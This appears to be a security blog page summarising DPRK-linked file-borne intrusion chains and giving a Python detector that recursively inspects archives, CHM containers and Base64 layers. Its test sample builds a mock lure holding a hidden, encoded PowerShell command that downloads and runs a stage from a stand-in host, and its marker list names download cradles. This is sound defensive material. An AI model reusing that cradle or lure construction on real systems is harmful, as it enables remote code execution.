Anticipating File-Borne Threats: How Deep File Inspection Technology Will Shape the Future of Cyber Defense
2023-09-28 • InQuest
InQuest describes DPRK-linked threat actors as part of a broader shift toward evasive, multilayered file-borne intrusion chains in a post-macro threat landscape (Office now blocks VBA macros in files from the internet by default, so attackers have moved to other containers). The excerpt identifies APT38 as a DPRK-directed group pursuing high-yield financial theft operations against global financial, media, and technology targets, delivering through trusted social media channels and layering archives, CHM content, MSI files, and scripted backdoors. It also cites APT37 activity using CHM-to-HTA-to-PowerShell chains that lead to backdoors and information stealers against targets in Asia and the Middle East and in civil society, defense, and government. Kimsuky is described using CHM lures such as tax investigation forms and interview requests that unpack VBS, batch scripts, Base64-encoded content, PowerShell, downloaders, keyloggers, clipboard stealers, and data-exfiltration components. CHM is the compiled HTML Help container: its embedded HTML and script run under hh.exe, which is why one file can carry an HTA stage that in turn launches PowerShell. The main defensive point is that these DPRK-linked examples show multiple subgroups adapting delivery chains to bypass gateway, antimalware, and signature-based controls: a control that classifies only the outer file type, or matches signatures against only the outer layer, never sees the script or the encoded command several layers down, so inspection has to recurse through each container and decode each encoding until it reaches the stage that actually executes.
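To make the layered-inspection point concrete, the following is an added example written for this page; it is not InQuest's code, not a vendor signature set, and not derived from any real sample. It recursively walks a zip archive, flags a CHM container by its ITSF header, looks for HTA/script-stage markers, and decodes long Base64 runs (including the UTF-16LE form that PowerShell's -EncodedCommand expects) so that a download cradle hidden two layers down is surfaced. The lure it inspects is constructed inline (a zip holding a fake CHM-tagged blob with an embedded HTA that runs an encoded PowerShell command) and the file name, hostname and marker list are assumptions for illustration. One caveat: a genuine CHM stores its HTML in LZX-compressed sections, so a production inspector would extract those sections first (for example with 7-Zip or a CHM library) before marker scanning; this example only reads the header and treats the rest of the blob as already unpacked.

```python
"""Layered file inspection: walk archives, flag CHM containers and embedded
script stages, and decode Base64 blobs to find PowerShell hidden underneath.
Added example for this page; not InQuest's tooling and not a real sample."""
import base64
import io
import re
import zipfile

CHM_MAGIC = b"ITSF"  # header of a compiled HTML Help (ITSS) file
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{40,}={0,2}")  # runs long enough to carry a command

# Illustrative byte markers of HTA / script stages seen in CHM-to-HTA-to-PowerShell
# chains. Matched against a lowercased copy of each layer. Assumed list, not a signature set.
SCRIPT_MARKERS = {
    "hta": b"<hta:application",
    "script_tag": b"<script",
    "wscript_shell": b"wscript.shell",
    "mshta": b"mshta",
    "powershell": b"powershell",
    "encoded_command": b"-encodedcommand",
    "download_cradle": b"downloadstring",
    "webclient": b"net.webclient",
}


def _decode_b64_run(run: bytes):
    """Decode one Base64 run; unwrap UTF-16LE (the -EncodedCommand form) to UTF-8."""
    run += b"=" * (-len(run) % 4)  # tolerate missing padding
    try:
        raw = base64.b64decode(run, validate=True)
    except ValueError:
        return None
    if raw and len(raw) % 2 == 0 and raw[1::2] == b"\x00" * (len(raw) // 2):
        try:
            return raw.decode("utf-16-le").encode("utf-8")
        except UnicodeDecodeError:
            return raw
    return raw


def inspect(data: bytes, path: str = "<root>", depth: int = 0, max_depth: int = 6):
    """Return a list of findings; each records the nesting layer it was found in."""
    findings = []
    if depth > max_depth:
        return [dict(path=path, layer=depth, kind="max_depth", detail="nesting limit")]
    # Containers: open archives and inspect every member one layer deeper.
    if zipfile.is_zipfile(io.BytesIO(data)):
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for info in zf.infolist():
                if not info.is_dir():
                    findings += inspect(zf.read(info), f"{path}/{info.filename}", depth + 1, max_depth)
        return findings
    if data.startswith(CHM_MAGIC):
        findings.append(dict(path=path, layer=depth, kind="chm_container", detail="ITSF header"))
    low = data.lower()
    for name, marker in SCRIPT_MARKERS.items():
        if marker in low:
            findings.append(dict(path=path, layer=depth, kind=name, detail=marker.decode()))
    # Encodings: decode each Base64 run and inspect the result as its own layer.
    for m in B64_RUN.finditer(data):
        decoded = _decode_b64_run(m.group(0))
        if decoded:
            findings += inspect(decoded, f"{path}|b64@{m.start()}", depth + 1, max_depth)
    return findings


def verdict(findings) -> str:
    """Simple chain rule: a CHM container plus a PowerShell stage or cradle anywhere below it."""
    kinds = {f["kind"] for f in findings}
    if "chm_container" in kinds and kinds & {"powershell", "encoded_command", "download_cradle"}:
        return "suspicious"
    return "clean"


def build_sample() -> bytes:
    """Constructed lure (zip -> CHM-tagged blob -> HTA -> encoded PowerShell); not a real file."""
    ps = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
    enc = base64.b64encode(ps.encode("utf-16-le")).decode()
    hta = ('<html><hta:application id="x"><script language="VBScript">'
           'Set o = CreateObject("WScript.Shell"):'
           f'o.Run "powershell -nop -w hidden -EncodedCommand {enc}", 0</script></html>')
    fake_chm = CHM_MAGIC + b"\x03\x00\x00\x00" + b"\x00" * 28 + hta.encode()
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Tax_Investigation_Form.chm", fake_chm)
    return buf.getvalue()


if __name__ == "__main__":
    results = inspect(build_sample())
    for f in results:
        print(f"layer {f['layer']}  {f['kind']:16} {f['path']}")
    print("verdict:", verdict(results))
```

Run stand-alone, it prints one line per finding with the layer at which it was seen: the ITSF header and HTA markers at layer 1 (inside the zip member) and the DownloadString cradle at layer 2 (inside the decoded -EncodedCommand blob). A gateway that stops at the zip, or at the .chm extension, reports none of this; the point of the recursion is that the verdict is driven by the innermost stage.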